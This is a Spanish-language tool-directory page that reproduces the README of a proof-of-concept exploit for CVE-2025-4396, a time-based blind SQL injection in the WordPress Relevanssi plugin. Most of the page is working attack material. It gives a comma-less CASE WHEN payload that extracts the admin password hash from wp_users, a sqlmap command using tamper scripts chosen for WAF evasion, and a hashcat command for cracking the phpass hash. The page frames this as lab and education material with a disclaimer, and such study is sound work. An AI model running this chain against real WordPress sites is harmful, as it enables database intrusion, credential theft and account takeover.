Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-4396 — CVE-2025-4396 - Inyección SQL ciega basada en tiempo en WordPress Relevanssi | Kitploit
Herramientas/GitHubGitHub/sup3rdav3/cve-2025-4396
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubsup3rdav3/cve-2025-4396

CVE-2025-4396

CVE-2025-4396 - Inyección SQL ciega basada en tiempo en WordPress Relevanssi

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-4396 — Inyección SQL en Relevanssi (Ciega Basada en Tiempo)

Descargo de responsabilidad: Este repositorio está destinado únicamente a pruebas de penetración autorizadas, investigación de seguridad y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal y poco ético.


Resumen

Un exploit de prueba de concepto para una vulnerabilidad de inyección SQL ciega basada en tiempo en el plugin Relevanssi 4.24.4 de WordPress. Esta implementación está diseñada específicamente para entornos endurecidos donde:

  • Las comas son filtradas — rompiendo la sintaxis estándar SUBSTR(str, pos, len) e IF(cond, true, false)
  • Se produce un comportamiento de sleep voraz — lo que hace que MySQL ejecute SLEEP() antes de evaluar la expresión completa, produciendo falsos positivos

Antecedentes

En ciertos entornos (p. ej., el laboratorio DVWP), las cargas útiles (payloads) estándar de inyección SQL fallan por dos razones clave:

ProblemaEfecto
Eliminación de comasRompe SUBSTR(str, pos, len) e IF(cond, true, false)
SLEEP() codiciosoMySQL ejecuta el sleep antes de la expresión booleana completa, causando falsos positivos

Ambos problemas requieren soluciones específicas, cubiertas por los enfoques manual y automatizado que se presentan a continuación.


Exploit manual (asy.py)

Un script asíncrono de Python que permite una extracción quirúrgica carácter por carácter. Evita la sobrecarga de las herramientas automatizadas y omite el filtrado de comas mediante la lógica CASE WHEN.

Características

CaracterísticaImplementación
E/S asíncronaaiohttp para solicitudes no bloqueantes

Lógica de inyección principal

root@kitploit:~
# Comma-less, CASE WHEN-based time-based payload
condition = f"ASCII(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1) FROM {pos} FOR 1))>{mid}"
injection = f"1*(SELECT CASE WHEN ({condition}) THEN SLEEP(3) ELSE 1 END)"

¿Por qué CASE WHEN en lugar de IF()? IF() usa comas y está sujeto a una evaluación codiciosa. CASE WHEN evalúa de forma diferida, asegurando que SLEEP() solo se dispare cuando la condición sea realmente TRUE.


Exploit automatizado (SQLMap)

SQLMap puede automatizar el descubrimiento en este entorno utilizando scripts tamper y flags específicos.

Comando

root@kitploit:~
python3 sqlmap.py -u "http://localhost:31337/?s=test&cats=1*" \
  --tamper=commalessmid,if2case,between \
  --technique=T \
  --dbms=MySQL \
  --no-cast \
  --batch \
  --threads=1 \
  --dbs

Referencia de Flags

Nota sobre --threads=1: Esto es esencial para una extracción fiable. El uso de varios hilos provoca que los retardos de sleep se superpongan, corrompiendo la sincronización de la búsqueda binaria y produciendo una salida distorsionada.


Hallazgos de laboratorio

CampoValor
ObjetivoTabla de WordPress

Rompiendo el hash

root@kitploit:~
hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
  • El modo -m 400 apunta a los hashes phpass
  • El ataque -a 0 es un ataque de diccionario directo con rockyou.txt

Referencias

  • Relevanssi Plugin — WordPress.org
  • Scripts Tamper de SQLMap
  • OWASP: Inyección SQL Ciega
  • phpass — Framework de hash de contraseñas
Descargar herramienta
Payloads sin comasSintaxis SUBSTR(str FROM pos FOR len)
Lógica no codiciosaCASE WHEN garantiza que SLEEP() solo se active cuando la condición sea TRUE
FlagPropósito
--tamper=commalessmid,if2caseReescribe los payloads en SQL sin comas; reemplaza IF() con CASE WHEN
--tamper=betweenReemplaza las comparaciones > con BETWEEN para una evasión adicional del WAF
--technique=TRestringe únicamente a inyección ciega basada en tiempo
--no-castEvita los envoltorios CAST() que introducen comas prohibidas
--threads=1Garantiza la precisión de los tiempos: las solicitudes concurrentes provocan retardos de sleep superpuestos
wp_users
Usuarioadmin (ID = 1)
Hash extraídoREDACTED
Algoritmophpass (hash de contraseñas estándar de WordPress)